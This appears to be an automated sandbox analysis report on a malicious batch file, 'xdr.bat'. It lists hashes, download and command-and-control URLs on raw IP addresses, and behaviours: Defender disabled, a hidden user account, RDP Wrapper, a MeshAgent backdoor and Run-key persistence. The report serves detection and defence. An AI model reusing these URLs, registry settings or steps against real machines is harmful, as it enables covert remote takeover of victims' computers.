Analysis
-
max time kernel
123s -
max time network
145s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24/10/2024, 17:40
Static task
static1
Behavioral task
behavioral1
Sample
xdr.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
xdr.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
xdr.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
xdr.bat
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral5
Sample
xdr.bat
Resource
win11-20241007-en
General
-
Target
xdr.bat
-
Size
4KB
-
MD5
9e779d369e3ca17fdc894d13c4fd797a
-
SHA1
bf7e34e0da33a587177e66cfcec51f3aa75b4a87
-
SHA256
15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394
-
SHA512
ab290641c94cd7d3270a236af9f1e849ea056fddcf3120afc3dbad61afd63453eca3732093799cc6b82f2275da74d374c453a324fa9e465d931d2dff71b351b1
-
SSDEEP
96:IQ356afgPZCo/r+ab5iGp8HRI3h8UfpTsbUdGD:Iw56afgQHRq8UfGbdD
Malware Config
Extracted
http://45.139.196.250/ngrok.yml
Extracted
http://45.139.196.250/ngrok.zip
Extracted
http://152.89.239.119/x222.jpg
Extracted
http://45.139.196.250/WindowsUpdate.jpg
Extracted
http://45.139.196.250/auto-install-hrdp.bat
Extracted
http://45.139.196.250/hrdp/hrdp.zip
Extracted
http://45.139.196.250/hrdp/update.zip
Extracted
http://45.139.196.250/hrdp/autoupdate.zip
Extracted
meshagent
2
hawlat
http://45.139.196.71:443/agent.ashx
-
mesh_id
0x2C8478969E4CFA9513F19039B18062AD421F4DAF221C1152A30999ADFFCB13924EE4197808C0B50EB8A4890383CFE71E
-
server_id
71C17FDD46B31764650F2D1D58C0308252130889EAD2CB51F652D3D44DDA6687355E5D788FD7CFD214D97F8E3D42DDAB
-
wss
wss://45.139.196.71:443/agent.ashx
Signatures
-
Detects MeshAgent payload 2 IoCs
resource yara_rule behavioral4/files/0x0028000000045049-19.dat family_meshagent behavioral4/memory/5080-23-0x00000000006F0000-0x0000000000ABD000-memory.dmp family_meshagent -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 10 IoCs
flow pid Process 11 4372 powershell.exe 12 2848 powershell.exe 30 2956 powershell.exe 32 1080 powershell.exe 36 1732 powershell.exe 37 2536 powershell.exe 42 1956 powershell.exe 43 4176 powershell.exe 53 2176 cscript.exe 54 2180 cscript.exe -
pid Process 1732 powershell.exe 1956 powershell.exe 4372 powershell.exe 1080 powershell.exe 2536 powershell.exe 4176 powershell.exe 2204 powershell.exe 2848 powershell.exe 2956 powershell.exe 4572 powershell.exe 4572 powershell.exe 4788 powershell.exe 1852 powershell.exe 5012 powershell.exe 2984 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 9 IoCs
pid Process 4928 netsh.exe 4408 netsh.exe 4736 netsh.exe 2916 netsh.exe 4328 netsh.exe 1248 netsh.exe 1128 netsh.exe 468 netsh.exe 816 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll" reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2104 attrib.exe 5072 attrib.exe 2292 attrib.exe 4588 attrib.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " s.exe -
Executes dropped EXE 24 IoCs
pid Process 1892 MeshAgent.exe 4192 MeshAgent.exe 4072 MeshAgent.exe 1236 RDPWInst.exe 1240 MeshAgent.exe 5012 RDPWInst.exe 1600 RDPWInst.exe 4148 MeshAgent.exe 3640 RDPWInst.exe 1764 RDPWInst.exe 1180 MeshAgent.exe 3056 RDPWInst.exe 2392 RDPWInst.exe 4696 MeshAgent.exe 2016 RDPWInst.exe 3360 RDPWInst.exe 2940 MeshAgent.exe 388 RDPWInst.exe 748 RDPWInst.exe 4052 MeshAgent.exe 1464 MeshAgent.exe 1852 MeshAgent.exe 2080 MeshAgent.exe 4148 MeshAgent.exe -
Loads dropped DLL 7 IoCs
pid Process 4460 svchost.exe 1424 svchost.exe 544 svchost.exe 1188 svchost.exe 1564 svchost.exe 928 svchost.exe 3140 svchost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 46 raw.githubusercontent.com 50 raw.githubusercontent.com 53 raw.githubusercontent.com 54 raw.githubusercontent.com 38 raw.githubusercontent.com 39 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\RDP Wrapper\RDPWInst.exe cmd.exe File created C:\Program Files\RDP Wrapper\autoupdate.zip powershell.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap_new.ini cscript.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.exe s.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\termsrv.dll cmd.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\autoupdate.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\termsrv.dll cmd.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_new.ini cscript.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh MeshAgent.exe File created C:\Program Files\RDP Wrapper\update.zip powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat powershell.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File created C:\Program Files\RDP Wrapper\autoupdate.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5028 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 27 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4668 PING.EXE 3832 PING.EXE -
Modifies data under HKEY_USERS 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133742652690259216" MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wmic.exe wmic.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created 